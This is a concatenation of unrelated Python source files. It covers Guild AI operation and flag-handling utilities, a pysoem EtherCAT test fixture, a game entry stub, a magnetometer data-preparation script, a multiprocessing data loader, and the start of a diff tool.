main_args = split_cmd(opdef.main or "")
exec_str, run_attrs = _opdef_exec_and_run_attrs(opdef)
exec_args = split_cmd(exec_str)
_apply_main_args(main_args, exec_args)
_apply_flag_args_marker(exec_args)
return exec_args, run_attrs
def split_cmd(cmd):
if isinstance(cmd, list):
return cmd
return util.shlex_split(cmd or "")
def _opdef_exec_and_run_attrs(opdef):
"""Returns exec template for opdef with required run attrs for opdef.
If exec is specified explicitly, it's returned, otherwise main or
steps are used to generate a template.
"""
if opdef.exec_:
if opdef.main:
log.warning(
"operation 'exec' and 'main' both specified, " "ignoring 'main'"
)
if opdef.steps:
log.warning(
"operation 'exec' and 'steps' both specified, " "ignoring 'steps'"
)
return opdef.exec_, None
elif opdef.main:
if opdef.steps:
log.warning(
"operation 'main' and 'steps' both specified, " "ignoring 'steps'"
)
return DEFAULT_EXEC, None
elif opdef.steps:
return STEPS_EXEC, _run_attrs_for_steps(opdef)
else:
raise InvalidOpDef(opdef, "must define either exec, main, or steps")
def _run_attrs_for_steps(opdef):
return {
"steps": opdef.steps,
}
def _apply_main_args(main_args, exec_args):
i = 0
while i < len(exec_args):
if exec_args[i] == "${main_args}":
exec_args[i : i + 1] = main_args
i += len(main_args)
i += 1
def _apply_flag_args_marker(exec_args):
for i, val in enumerate(exec_args):
if val == "${flag_args}":
exec_args[i] = "__flag_args__"
def _op_cmd_env(opdef, extra_env):
env = dict(opdef.env or {})
env.update(extra_env or {})
env["GUILD_PLUGINS"] = _op_plugins(opdef)
env["PROJECT_DIR"] = opdef.guildfile.dir or ""
if opdef.flags_dest:
env["FLAGS_DEST"] = opdef.flags_dest
if opdef.handle_keyboard_interrupt:
env["HANDLE_KEYBOARD_INTERRUPT"] = "1"
return env
def _op_plugins(opdef):
from guild import plugin as pluginlib # expensive
project_plugins = _project_plugins(opdef)
op_plugins = []
for name, plugin in pluginlib.iter_plugins():
if not _plugin_selected(plugin, project_plugins):
log.debug("plugin '%s' not configured for operation", name)
continue
enabled, reason = plugin.enabled_for_op(opdef)
if not enabled:
log.debug(
"plugin '%s' configured for operation but cannot be enabled%s",
name,
" (%s)" % reason if reason else "",
)
continue
log.debug(
"plugin '%s' enabled for operation%s",
name,
" (%s)" % reason if reason else "",
)
op_plugins.append(name)
return ",".join(sorted(op_plugins))
def _project_plugins(opdef):
if opdef.plugins is not None:
return opdef.plugins or []
return opdef.modeldef.plugins or []
def _plugin_selected(plugin, selected):
for name in selected:
if name == plugin.name or name in plugin.provides:
return True
return False
def _op_cmd_flags(opdef):
return {flagdef.name: _flag_cmd_for_flagdef(flagdef) for flagdef in opdef.flags}
def _flag_cmd_for_flagdef(flagdef):
return op_cmd_lib.CmdFlag(
arg_name=flagdef.arg_name,
arg_skip=_flagdef_arg_skip(flagdef),
arg_switch=flagdef.arg_switch,
env_name=flagdef.env_name,
)
def _flagdef_arg_skip(flagdef):
if flagdef.arg_skip is not None:
return flagdef.arg_skip
return flagdef.opdef.default_flag_arg_skip
###################################################################
# Flag vals for opdef
###################################################################
def flag_vals_for_opdef(opdef, user_flag_vals=None, force=False):
flag_vals = dict(user_flag_vals)
_apply_default_flag_vals(opdef.flags, flag_vals)
_apply_coerce_flag_vals(opdef.flags, force, flag_vals)
resource_flagdefs = _resource_flagdefs(opdef, flag_vals)
_apply_coerce_flag_vals(resource_flagdefs, force, flag_vals)
_apply_default_flag_vals(resource_flagdefs, flag_vals)
all_flagdefs = opdef.flags + resource_flagdefs
if not force:
_check_no_such_flags(flag_vals, all_flagdefs)
_check_flag_vals(flag_vals, all_flagdefs)
_check_required_flags(flag_vals, all_flagdefs)
_apply_choice_vals(opdef.flags, user_flag_vals, flag_vals)
return flag_vals, resource_flagdefs
def _apply_coerce_flag_vals(flagdefs, force, vals):
flagdef_lookup = {flagdef.name: flagdef for flagdef in flagdefs}
for name, val in vals.items():
try:
coerced = _coerced_flag_value(name, val, flagdef_lookup)
except InvalidFlagValue:
if not force:
raise
else:
vals[name] = coerced
def _coerced_flag_value(name, val, flagdefs):
flagdef = flagdefs.get(name)
if not flagdef:
return val
try:
return coerce_flag_value(val, flagdef)
except (ValueError, TypeError) as e:
raise InvalidFlagValue(val, flagdef, str(e))
def coerce_flag_value(val, flagdef):
"""Coerces a flag value based on flagdef settings."""
if (
val is None
or not flagdef
or not flagdef.type
or flagdef.type == "auto"
or flag_util.is_flag_function(val)
):
return val
if isinstance(val, list):
return [coerce_flag_value(x, flagdef) for x in val]
elif flagdef.type == "string":
return _try_coerce_flag_val(val, str, flagdef)
elif flagdef.type == "int":
if isinstance(val, float):
raise ValueError("invalid value for type 'int'")
return _try_coerce_flag_val(val, int, flagdef)
elif flagdef.type == "float":
return _try_coerce_flag_val(val, float, flagdef)
elif flagdef.type == "boolean":
return _try_coerce_flag_val(val, bool, flagdef)
elif flagdef.type == "number":
if isinstance(val, (float, int)):
return val
return _try_coerce_flag_val(val, (int, float), flagdef)
elif flagdef.type in ("path", "existing-path"):
return _resolve_rel_path(val)
else:
log.warning(
"unknown flag type '%s' for %s - cannot coerce", flagdef.type, flagdef.name
)
return val
def _try_coerce_flag_val(val, funs, flagdef):
if not isinstance(funs, tuple):
funs = (funs,)
for f in funs:
try:
return f(val)
except ValueError as e:
log.debug("value error applying %s to %r: %s", f, val, e)
raise ValueError("invalid value for type '%s'" % flagdef.type)
def _resolve_rel_path(val):
val = os.path.expanduser(val)
if val and not os.path.isabs(val):
return os.path.abspath(val)
return val
def _resource_flagdefs(opdef, flag_vals):
return list(_iter_resource_flagdefs(opdef, flag_vals))
def _iter_resource_flagdefs(opdef, flag_vals):
for dep in opdef.dependencies:
try:
resdef, _location = op_dep.resource_def(dep, flag_vals)
except op_dep.OpDependencyError:
pass
else:
if resdef.flag_name:
yield _ResourceFlagDefProxy(resdef.flag_name, opdef)
else:
op_name = _required_operation_name(resdef)
if op_name:
yield _ResourceFlagDefProxy(op_name, opdef)
def _required_operation_name(resdef):
for source in resdef.sources:
if source.uri.startswith("operation:"):
return resdef.name
return None
def _ResourceFlagDefProxy(name, opdef):
data = {
"arg-skip": True,
"type": "string",
"null-label": "unspecified",
}
return guildfile.FlagDef(name, data, opdef)
def _check_no_such_flags(flag_vals, flagdefs):
flagdef_names = set([flagdef.name for flagdef in flagdefs])
for name in flag_vals:
if name not in flagdef_names:
raise NoSuchFlagError(name)
def _check_flag_vals(vals, flagdefs):
for flag in flagdefs:
val = vals.get(flag.name)
_check_flag_val(val, flag)
def _check_flag_val(val, flag):
if isinstance(val, list):
for x in val:
_check_flag_val(x, flag)
elif flag_util.is_flag_function(val):
pass
else:
_check_flag_choice(val, flag)
_check_flag_type(val, flag)
_check_flag_range(val, flag)
def _check_flag_choice(val, flag):
if not val or flag.allow_other or not flag.choices:
return
for choice in flag.choices:
if choice.alias and val == choice.alias:
return
if choice.value == val:
return
raise InvalidFlagChoice(val, flag)
def _check_flag_type(val, flag):
if flag.type == "existing-path":
if val and not os.path.exists(val):
raise InvalidFlagValue(val, flag, "%s does not exist" % val)
def _check_flag_range(val, flag):
if val is None:
return
if flag.min is not None and val < flag.min:
raise InvalidFlagValue(val, flag, "out of range (less than min %s)" % flag.min)
if flag.max is not None and val > flag.max:
raise InvalidFlagValue(
val, flag, "out of range (greater than max %s)" % flag.max
)
def _apply_choice_vals(flagdefs, user_vals, target_vals):
for flagdef in flagdefs:
if not flagdef.choices:
continue
flag_val = target_vals.get(flagdef.name)
if flag_val is None:
continue
for choice in flagdef.choices:
if (choice.alias or choice.value) != flag_val:
continue
if choice.alias:
target_vals[flagdef.name] = choice.value
if choice.flags:
_apply_choice_flags(choice.flags, user_vals, target_vals)
def _apply_choice_flags(choice_flags, user_vals, target_vals):
for flag_name, flag_val in choice_flags.items():
if user_vals.get(flag_name) is None:
target_vals[flag_name] = flag_val
def _check_required_flags(vals, flagdefs):
missing = _missing_flags(vals, flagdefs)
if missing:
raise MissingRequiredFlags(missing)
def _missing_flags(vals, flagdefs):
return [
flag
for flag in flagdefs
if flag.required and _flag_missing(vals.get(flag.name))
]
def _flag_missing(val):
if val is None or val == "":
return True
return False
def _apply_default_flag_vals(flagdefs, flag_vals):
"""Applies default values to flag_vals.
Skips flag values that are already defined in flag_vals.
"""
for flagdef in flagdefs:
if flagdef.name not in flag_vals:
flag_vals[flagdef.name] = flagdef.default
def flag_assigns(flags, skip_none=False):
return [
flag_assign(name, val)
for name, val in sorted(flags.items())
if not skip_none or val is not None
]
def flag_assign(name, val):
return "%s=%s" % (name, flag_util.format_flag(val))
def parse_flag_assigns(args, opdef=None):
flag_types = _flag_types_for_opdef(opdef) if opdef else None
return dict([parse_flag_arg(os.path.expanduser(arg), flag_types) for arg in args])
def _flag_types_for_opdef(opdef):
return {flagdef.name: flagdef.type for flagdef in opdef.flags}
def parse_flag_arg(arg, flag_types=None):
parts = arg.split("=", 1)
if len(parts) == 1:
raise ArgValueError(arg)
else:
flag_type = flag_types.get(parts[0]) if flag_types else None
return parts[0], flag_util.decode_flag_val(parts[1], flag_type)
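# Illustrative parsing (assignments are hypothetical):
#
#     parse_flag_assigns(["lr=0.1", "optimizer=adam"])
#         -> {"lr": 0.1, "optimizer": "adam"}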
def args_to_flags(args):
"""Returns `flags, other_args` for `args`.
`other_args` is a list of args that cannot be converted to flag
values.
    If args contains `--` then all args before the last occurring `--`
are included in `other_args`.
Uses `util.decode_yaml()` to decode flag arg values.
"""
flags = {}
flag_args, other_args = split_args_for_flags(args)
name = None
for arg in flag_args:
if arg[:2] == "--":
name = arg[2:]
flags[name] = True
elif arg[:1] == "-":
val = util.decode_yaml(arg)
if isinstance(val, (int, float)):
flags[name] = val
elif len(arg) == 2:
name = arg[1]
flags[name] = True
elif len(arg) > 2:
name = None
flags[arg[1]] = arg[2:]
elif name is not None:
flags[name] = util.decode_yaml(arg)
name = None
else:
other_args.append(arg)
return flags, other_args
def split_args_for_flags(args):
"""Returns `split_args, other_args` for `args`.
Split occurs using the last occurrence of `--` in `args`.
If `arg` does not contain `--` returns `args, []`.
"""
for i in range(len(args) - 1, -1, -1):
if args[i] == "--":
return args[i + 1 :], args[:i]
return args, []
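# Illustrative behaviour (argument lists are hypothetical):
#
#     args_to_flags(["--lr", "0.1", "--debug"])
#         -> ({"lr": 0.1, "debug": True}, [])
#     args_to_flags(["train.py", "--", "--epochs", "10"])
#         -> ({"epochs": 10}, ["train.py"])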
def global_dest(global_name, flags):
dest = cur = {}
for name in global_name.split("."):
cur = cur.setdefault(name, {})
cur.update(flags)
return dest
def flags_desc(flags, truncate_floats=False, delim=", "):
formatted = flag_util.flag_assigns(flags, truncate_floats)
return delim.join(formatted)
###################################################################
# Op deps IO
###################################################################
def op_deps_as_data(deps):
return [_op_dep_as_data(dep) for dep in deps or []]
def _op_dep_as_data(dep):
data = _resdef_data(dep.resdef)
if dep.res_location:
data["location"] = dep.res_location
if dep.config:
data["config"] = dep.config
return data
def _resdef_data(resdef):
data = dict(resdef._data)
data["name"] = resdef.name
return data
def op_deps_for_data(data):
return [_op_dep_for_data(item_data) for item_data in data or []]
def _op_dep_for_data(data):
resdef = _resdef_from_data(data)
location = data.get("location")
config = data.get("config")
return op_dep.OpDependency(resdef, location, config)
def _resdef_from_data(data):
name = data.get("name")
return guildfile.ResourceDef(name, data, _ModelDefProxy())
class _ModelDefProxy(object):
name = ""
guildfile = None
parents = []
###################################################################
# Trials support
###################################################################
def trials_for_batch_files(files):
trials = []
for path in files:
trials.extend(_read_trials(path))
return trials
def _read_trials(path):
ext = os.path.splitext(path)[1].lower()
if ext in (".json", ".yml", ".yaml"):
return _yaml_trials(path)
elif ext in ("", ".csv"):
return _csv_trials(path)
else:
raise BatchFileError(path, "unsupported extension")
def _yaml_trials(path):
try:
data = yaml.safe_load(open(path, "r"))
except Exception as e:
raise BatchFileError(path, str(e))
else:
return _coerce_trials_data(data, path)
def _coerce_trials_data(data, path):
if not isinstance(data, list):
if not isinstance(data, dict):
raise BatchFileError(
path,
"invalid data type for trials: expected list or dict"
", got %s" % type(data).__name__,
)
data = [data]
for item in data:
if not isinstance(item, dict):
raise BatchFileError(
path, "invalid data type for trial %r: expected dict" % item
)
return data
def _csv_trials(path):
reader = csv.reader(open(path, "r"))
try:
flag_names = next(reader)
except StopIteration:
return []
else:
return [dict(zip(flag_names, _flag_vals(row))) for row in reader]
def _flag_vals(row):
return [flag_util.decode_flag_val(s) for s in row]
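# For example, a CSV batch file with the (hypothetical) contents
#
#     lr,batch_size
#     0.1,32
#     0.01,64
#
# yields [{"lr": 0.1, "batch_size": 32}, {"lr": 0.01, "batch_size": 64}].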
###################################################################
# Restart support
###################################################################
def restart_needed(run, flags):
return run.status in RESTART_NEEDED_STATUS or run.get("flags") != flags
def run_params_for_restart(run, user_specified_params=None):
"""Returns params for use in run command for a restart of run.
The set of applicable params in the run "run_params" attribute are
considered. If user_specified_params contains a non-default value
(i.e. the user has indicated she wants to use a specific value)
that param will not be included in the result. If
user_specified_params is None (default) then all applicable params
for a restart that are defined in run are returned.
"""
# Note about applicable run params:
#
# A limited number of params could possibly apply to args - those
# are listed here. This list has to be maintained as new args are
# added to the run command. Params must be included where the user
# would reasonably assume applicability and never in cases where
# the use of the parameter would be clearly surprising to the user
# (e.g. reusing the 'yes' param, which would alter the expected
# behavior of the command on a restart).
#
# Params that are saved as run attrs or otherwise available under
# the run guild path (e.g. opspec, label, flags) should NOT be
    # returned in this value in the interest of eliminating redundancy
    # and potential mismatch bugs. Anyone needing those values MUST
# read them via run attrs or applicable run interface
    # (e.g. opref in the case of opspec).
#
applicable_run_params = [
"force_flags",
"gpus",
"max_trials",
"maximize",
"minimize",
"no_gpus",
"opt_flags",
"optimizer",
"random_seed",
]
from guild.commands.run import run as run_cmd
run_params = run.get("run_params", {})
if not isinstance(run_params, dict):
return
baseline_params = run_cmd.make_context("", []).params
result = {}
for name in run_params:
val = _coerce_run_param(name, run_params[name])
if name not in applicable_run_params:
continue
if user_specified_params is None:
result[name] = val
continue
try:
user_specified_val = user_specified_params[name]
except KeyError:
result[name] = val
continue
if user_specified_val != baseline_params[name]:
continue
result[name] = val
return result
def _coerce_run_param(name, val):
"""Ensures that named param is valid for the run command."""
if name == "flags":
return tuple(val)
return val
###################################################################
# Wait for proc
###################################################################
def wait_for_proc(p, stop_after_min, poll_interval=None, kill_delay=None):
poll_interval = poll_interval or DEFAULT_PROC_POLL_INTERVAL
kill_delay = kill_delay or DEFAULT_PROC_KILL_DELAY
started = time.time()
stop_at = time.time() + stop_after_min * 60
while time.time() < stop_at:
returncode = p.poll()
if returncode is not None:
return returncode
time.sleep(poll_interval)
elapsed = (time.time() - started) / 60
log.info("Stopping process early (pid %i) - %.1f minute(s) elapsed", p.pid, elapsed)
return _terminate(p, poll_interval, kill_delay)
def _terminate(p, poll_interval, kill_delay):
kill_at = time.time() + kill_delay
p.terminate()
while p.poll() is None and time.time() < kill_at:
time.sleep(poll_interval)
if p.poll() is None:
log.warning("Process did not terminate (pid %i), killing", p.pid)
p.kill()
time.sleep(poll_interval)
returncode = p.poll()
if returncode not in (0, -15):
raise ProcessError("Process did not terminate gracefully (pid %i)" % p.pid)
return returncode
###################################################################
# Utils
###################################################################
def split_batch_files(flag_args):
batch_files = []
rest = []
for arg in flag_args:
if arg[:1] == "@":
batch_files.append(arg[1:])
else:
rest.append(arg)
return batch_files, rest
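# Illustrative split (arguments are hypothetical):
#
#     split_batch_files(["@trials.csv", "lr=0.1"])
#         -> (["trials.csv"], ["lr=0.1"])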
def find_matching_runs(opref, flag_vals, include_pending=False):
return [
run
for run in var.runs()
if is_matching_run(run, opref, flag_vals, include_pending)
]
def is_matching_run(run, opref, flag_vals, include_pending=False):
return (
run.opref == opref
and run.get("flags") == flag_vals
and (include_pending or run.status != "pending")
)
def op_flag_encoder(flag_encoder):
if not flag_encoder:
return None
parts = flag_encoder.split(":")
if len(parts) != 2:
log.warning("invalid flag decoder %r - must be MODULE:FUNCTION", flag_encoder)
return None
mod_name, fun_name = parts
try:
mod = importlib.import_module(mod_name)
except Exception as e:
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception("importing %s", mod_name)
else:
log.warning("cannot load flag decoder %r: %s", flag_encoder, e)
return None
fun = getattr(mod, fun_name, None)
if fun is None:
log.warning(
"cannot load flag decoder %r: no such attribute in %s",
flag_encoder,
mod_name,
)
return None
return fun
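# Illustrative note (not part of the original module): a flag encoder spec is a
# "MODULE:FUNCTION" string, e.g. "myproject.flags:encode" (hypothetical), that
# op_flag_encoder resolves to a callable via importlib; malformed or
# unresolvable specs log a warning and yield None rather than raising.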
def write_proc_lock(pid, run):
with open(run.guild_path("LOCK"), "w") as f:
f.write(str(pid))
def delete_proc_lock(run):
try:
os.remove(run.guild_path("LOCK"))
except OSError:
pass
def init_logging():
if os.getenv("LOG_INIT_SKIP") == "1":
return
level = int(os.getenv("LOG_LEVEL", logging.WARN))
format = os.getenv("LOG_FORMAT", "%(levelname)s: [%(name)s] %(message)s")
loglib.init_logging(level, {"_": format})
|
conftest.py
|
import time
import collections
import threading
import pytest
import pysoem
def pytest_addoption(parser):
parser.addoption('--ifname', action='store')
class PySoemTestEnvironment:
"""Setup a basic pysoem test fixture that is needed for most of tests"""
BECKHOFF_VENDOR_ID = 0x0002
EK1100_PRODUCT_CODE = 0x044c2c52
EL3002_PRODUCT_CODE = 0x0bba3052
EL1259_PRODUCT_CODE = 0x04eb3052
def __init__(self, ifname):
self._ifname = ifname
self._master = pysoem.Master()
self._master.in_op = False
self._master.do_check_state = False
self._proc_thread_handle = None
self._check_thread_handle = None
self._pd_thread_stop_event = threading.Event()
self._ch_thread_stop_event = threading.Event()
self._actual_wkc = 0
self.SlaveSet = collections.namedtuple('SlaveSet', 'name vendor_id product_code config_func')
self.el3002_config_func = None
self.el1259_config_func = None
self._expected_slave_layout = None
def setup(self):
self._expected_slave_layout = {
0: self.SlaveSet('XMC43-Test-Device', 0, 0x12783456, None),
1: self.SlaveSet('EK1100', self.BECKHOFF_VENDOR_ID, self.EK1100_PRODUCT_CODE, None),
2: self.SlaveSet('EL3002', self.BECKHOFF_VENDOR_ID, self.EL3002_PRODUCT_CODE, self.el3002_config_func),
3: self.SlaveSet('EL1259', self.BECKHOFF_VENDOR_ID, self.EL1259_PRODUCT_CODE, self.el1259_config_func),
}
self._master.open(self._ifname)
assert self._master.config_init(False) > 0
self._master.config_dc()
for i, slave in enumerate(self._master.slaves):
assert slave.man == self._expected_slave_layout[i].vendor_id
assert slave.id == self._expected_slave_layout[i].product_code
slave.config_func = self._expected_slave_layout[i].config_func
slave.is_lost = False
self._master.config_map()
assert self._master.state_check(pysoem.SAFEOP_STATE) == pysoem.SAFEOP_STATE
def go_to_op_state(self):
self._master.state = pysoem.OP_STATE
self._proc_thread_handle = threading.Thread(target=self._processdata_thread)
self._proc_thread_handle.start()
self._check_thread_handle = threading.Thread(target=self._check_thread)
self._check_thread_handle.start()
self._master.write_state()
        all_slaves_reached_op_state = False
        for _ in range(400):
            self._master.state_check(pysoem.OP_STATE, 50000)
            if self._master.state == pysoem.OP_STATE:
                all_slaves_reached_op_state = True
                break
        assert all_slaves_reached_op_state, 'could not reach OP state'
self._master.in_op = True
def teardown(self):
self._pd_thread_stop_event.set()
self._ch_thread_stop_event.set()
if self._proc_thread_handle:
self._proc_thread_handle.join()
if self._check_thread_handle:
self._check_thread_handle.join()
self._master.state = pysoem.INIT_STATE
self._master.write_state()
self._master.close()
def get_master(self):
return self._master
def get_slaves(self):
return self._master.slaves
def get_slave_for_foe_testing(self):
return self._master.slaves[0] # the XMC device
def get_slave_without_foe_support(self):
return self._master.slaves[2] # the EL3002
def _processdata_thread(self):
while not self._pd_thread_stop_event.is_set():
self._master.send_processdata()
self._actual_wkc = self._master.receive_processdata(10000)
time.sleep(0.01)
@staticmethod
def _check_slave(slave, pos):
if slave.state == (pysoem.SAFEOP_STATE + pysoem.STATE_ERROR):
print(
'ERROR : slave {} is in SAFE_OP + ERROR, attempting ack.'.format(pos))
slave.state = pysoem.SAFEOP_STATE + pysoem.STATE_ACK
slave.write_state()
elif slave.state == pysoem.SAFEOP_STATE:
print(
'WARNING : slave {} is in SAFE_OP, try change to OPERATIONAL.'.format(pos))
slave.state = pysoem.OP_STATE
slave.write_state()
elif slave.state > pysoem.NONE_STATE:
if slave.reconfig():
slave.is_lost = False
print('MESSAGE : slave {} reconfigured'.format(pos))
elif not slave.is_lost:
slave.state_check(pysoem.OP_STATE)
if slave.state == pysoem.NONE_STATE:
slave.is_lost = True
print('ERROR : slave {} lost'.format(pos))
if slave.is_lost:
if slave.state == pysoem.NONE_STATE:
if slave.recover():
slave.is_lost = False
print(
'MESSAGE : slave {} recovered'.format(pos))
else:
slave.is_lost = False
print('MESSAGE : slave {} found'.format(pos))
def _check_thread(self):
while not self._ch_thread_stop_event.is_set():
if self._master.in_op and ((self._actual_wkc < self._master.expected_wkc) or self._master.do_check_state):
self._master.do_check_state = False
self._master.read_state()
for i, slave in enumerate(self._master.slaves):
if slave.state != pysoem.OP_STATE:
self._master.do_check_state = True
self._check_slave(slave, i)
if not self._master.do_check_state:
print('OK : all slaves resumed OPERATIONAL.')
time.sleep(0.01)
@pytest.fixture
def pysoem_environment(request):
env = PySoemTestEnvironment(request.config.getoption('--ifname'))
yield env
env.teardown()
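# Illustrative sketch (not part of the original conftest): a test consuming the
# fixture above might bring the bus up and check the resulting master state.
# The test body below is an assumption for demonstration only.
#
# def test_all_slaves_reach_op_state(pysoem_environment):
#     pysoem_environment.setup()
#     pysoem_environment.go_to_op_state()
#     assert pysoem_environment.get_master().state == pysoem.OP_STATE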
|
main.py
|
#!/usr/bin/env python
# wipflag{todo}
from threading import Thread
from game import Game
from bytekeeper import ByteKeeper
from broker import Broker # todo
class Main:
def __init__(self):
print('starting main...\n')
self.running = True
self.bytekeeper = ByteKeeper()
self.game = Game(self, self.bytekeeper)
# self.broker = Broker(self, self.bytekeeper)
self.gamethread = Thread(target=self.game.run)
# self.brokerthread = Thread(target=self.broker.run)
self.gamethread.start()
# self.brokerthread.start()
if __name__ == "__main__":
main = Main()
|
ServerDataPrep.py
|
import numpy as np
import pandas as pd
import spacepy.datamodel as dm
from spacepy import pycdf
import os
import pickleshare as ps
from multiprocessing import Process
db_pathway = '~/Database'
db = ps.PickleShareDB(db_pathway)
def data_in(f_name, LOCATION):
    """Read one magnetometer CDF file for LOCATION and return a 1-minute
    resampled DataFrame along with a success flag."""
    try:
        data = dm.fromCDF(f_name).copy()
    except Exception:
        # fall back to the raw pycdf reader if spacepy's datamodel fails
        try:
            data = pycdf.CDF(f_name)
        except Exception:
            print('Issue with:', f_name)
            return pd.DataFrame(), False
    time = data['thg_mag_' + LOCATION + '_time'].copy()
    D = data['thg_mag_' + LOCATION].copy()
    df = pd.DataFrame(D, index=time)
    df.index = pd.to_datetime(df.index, unit='s')
    df = df.resample('1min').mean()
    return df, True
def get_data(LOCATION, YEAR):
pathway = '/Data/Magnetometers/' + LOCATION + '/' + str(YEAR) + '/'
fname = 'Corrupt/' + LOCATION + '/' + str(YEAR) + '/bad_files'
db[fname] = []
    try:
        file_list = sorted(os.listdir(pathway))
        year_present = True
    except OSError:
        year_present = False
        print(str(YEAR) + '---' + LOCATION, 'not in database')
if year_present and (len(file_list) > 1):
df_full, G = data_in(pathway + file_list[0], LOCATION)
for file in file_list[1:]:
df, G = data_in(pathway + file, LOCATION)
if G:
df_full = pd.concat((df_full, df), axis=0)
fname = '/Data/HDF/' + str(YEAR) + '/' + LOCATION + '.hdf'
print(fname, YEAR, 'Complete')
        df_full = df_full.drop_duplicates()
        # log of the Euclidean norm of the per-minute field change, i.e. log|dB/dt|
        df_dbdt = df_full.diff()**2
        df_dbdt = np.log(df_dbdt.sum(axis=1)**(1/2))
        # drop the infinities produced by log(0), then average onto a 5-minute grid
        df_dbdt = df_dbdt.replace(np.inf, np.nan).replace(-np.inf, np.nan).dropna()
        df_dbdt = df_dbdt[str(YEAR)].resample('5min', label='left').mean()
        df_dbdt.to_hdf(fname, key='Y' + str(YEAR), mode='w', format='f')
else:
print('Exiting....')
return
def step1(LOCATION):
procs = []
for YEAR in range(2007, 2018):
proc = Process(target=get_data, name=LOCATION + str(YEAR),
args=(LOCATION, YEAR))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
return
def main():
pathway = '/Data/Magnetometers/'
stations = sorted(os.listdir(pathway))[70:]
procs = []
for j in range(len(stations)):
LOCATION = stations[j]
if LOCATION != 'han':
proc = Process(target=step1, name=LOCATION,
args=(LOCATION,))
procs.append(proc)
proc.start()
if (j + 1) % 15 == 0:
print(procs)
for proc in procs:
proc.join()
print(proc)
procs=[]
for proc in procs:
proc.join()
return
def merge_data(YEAR):
pathway = '/Data/HDF/' + str(YEAR) + '/'
    try:
        file_list = sorted(os.listdir(pathway))
        year_present = True
    except OSError:
        year_present = False
        print(str(YEAR) + '--- not in database')
start = str(YEAR) + '-01-01-00:00:00'
end = str(YEAR) + '-12-31-23:55:00'
tindex = pd.date_range(start=start, end=end, freq='5min')
df = pd.DataFrame(index=tindex)
if year_present and (len(file_list) > 1):
        for file in file_list:
            name = file.split('.')[0]
            df[name] = pd.read_hdf(pathway + file)
fname = '/Data/HDF_Full/' + str(YEAR) + '.hdf'
df.to_hdf(fname, key='Y' + str(YEAR), mode='w', format='f')
print(YEAR, df.shape)
else:
print('Exiting....')
return
#p = np.asarray([np.asarray([x for x in v[i:i+10]]) for i in range(len(v[:30])-1)])
#p = np.asarray([np.asarray([x for x in df.iloc[i:i+10].values]) for i in range(len(v[:50])-10)])
#p = p.swapaxes(1,2)
#main()
def find_missing():
stations = sorted(os.listdir('/Data/Magnetometers/'))
procs = []
for YEAR in range(2007,2018):
for station in stations:
            try:
                file_list = sorted(os.listdir('/Data/Magnetometers/' + station + '/' + str(YEAR)))
                year_present = len(file_list) > 1
            except OSError:
                year_present = False
if year_present:
n_file_list = sorted(os.listdir('/Data/HDF/' + str(YEAR)))
if station + '.hdf' not in n_file_list:
print(station, YEAR)
proc = Process(target=get_data, name=station + str(YEAR),
args=(station, YEAR))
procs.append(proc)
proc.start()
if len(procs) == 15:
print(procs)
for proc in procs:
proc.join()
print(proc)
procs=[]
if len(procs) > 2:
for proc in procs:
proc.join()
return
#find_missing()
# merge_data(YEAR)
#fname = '/Data/HDF_Full/'
#files = sorted(os.listdir(fname))
#
#for file in files:
# df = pd.read_hdf(fname + file)
# print(df.shape)
|
dataloader.py
|
import numpy as np
import multiprocessing
import queue
from itertools import cycle
def default_collate(batch):
    if isinstance(batch[0], np.ndarray):
        return np.stack(batch)
    if isinstance(batch[0], (int, float)):
        return np.array(batch)
    if isinstance(batch[0], (list, tuple)):
        return tuple(default_collate(var) for var in zip(*batch))
    raise TypeError(f"default_collate cannot handle batch elements of type {type(batch[0])!r}")
class NaiveDataLoader:
def __init__(self, dataset, batch_size=64, collate_fn=default_collate):
self.index = 0
self.dataset = dataset
self.batch_size = batch_size
self.collate_fn = collate_fn
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index >= len(self.dataset):
raise StopIteration
batch_size = min(len(self.dataset) - self.index, self.batch_size)
return self.collate_fn([self.get() for _ in range(batch_size)])
def get(self):
item = self.dataset[self.index]
self.index += 1
return item
def worker_fn(dataset, index_queue, output_queue):
while True:
# Worker function, simply reads indices from index_queue, and adds the
# dataset element to the output_queue
try:
index = index_queue.get(timeout=0)
except queue.Empty:
continue
if index is None:
break
output_queue.put((index, dataset[index]))
class DataLoader(NaiveDataLoader):
def __init__(
self,
dataset,
batch_size=64,
num_workers=1,
prefetch_batches=2,
collate_fn=default_collate,
):
super().__init__(dataset, batch_size, collate_fn)
self.num_workers = num_workers
self.prefetch_batches = prefetch_batches
self.output_queue = multiprocessing.Queue()
self.index_queues = []
self.workers = []
self.worker_cycle = cycle(range(num_workers))
self.cache = {}
self.prefetch_index = 0
for _ in range(num_workers):
index_queue = multiprocessing.Queue()
worker = multiprocessing.Process(
target=worker_fn, args=(self.dataset, index_queue, self.output_queue)
)
worker.daemon = True
worker.start()
self.workers.append(worker)
self.index_queues.append(index_queue)
self.prefetch()
    def prefetch(self):
        while (
            self.prefetch_index < len(self.dataset)
            and self.prefetch_index
            < self.index + self.prefetch_batches * self.num_workers * self.batch_size
        ):
            # if the prefetch_index hasn't reached the end of the dataset and it
            # is not prefetch_batches batches (per worker) ahead, add indexes to
            # the index queues
            self.index_queues[next(self.worker_cycle)].put(self.prefetch_index)
            self.prefetch_index += 1
def __iter__(self):
self.index = 0
self.cache = {}
self.prefetch_index = 0
self.prefetch()
return self
def get(self):
self.prefetch()
if self.index in self.cache:
item = self.cache[self.index]
del self.cache[self.index]
else:
while True:
try:
(index, data) = self.output_queue.get(timeout=0)
except queue.Empty: # output queue empty, keep trying
continue
if index == self.index: # found our item, ready to return
item = data
break
else: # item isn't the one we want, cache for later
self.cache[index] = data
self.index += 1
return item
def __del__(self):
try:
for i, w in enumerate(self.workers):
self.index_queues[i].put(None)
w.join(timeout=5.0)
for q in self.index_queues:
q.cancel_join_thread()
q.close()
self.output_queue.cancel_join_thread()
self.output_queue.close()
finally:
for w in self.workers:
if w.is_alive():
w.terminate()
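# Illustrative usage sketch (not part of the original module). The toy dataset
# below is an assumption for demonstration; any object supporting __getitem__
# and __len__ works, since workers only index into it.
if __name__ == "__main__":
    toy_dataset = [(np.random.rand(3, 32, 32), i % 10) for i in range(256)]
    loader = DataLoader(toy_dataset, batch_size=32, num_workers=2)
    for images, labels in loader:
        # default_collate stacks tuple elements column-wise:
        # images -> (32, 3, 32, 32), labels -> (32,)
        print(images.shape, labels.shape)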
|
diff.py
|
#!/usr/bin/env python3
# PYTHON_ARGCOMPLETE_OK
import argparse
import sys
from typing import (
Any,
Callable,
Dict,
Iterator,
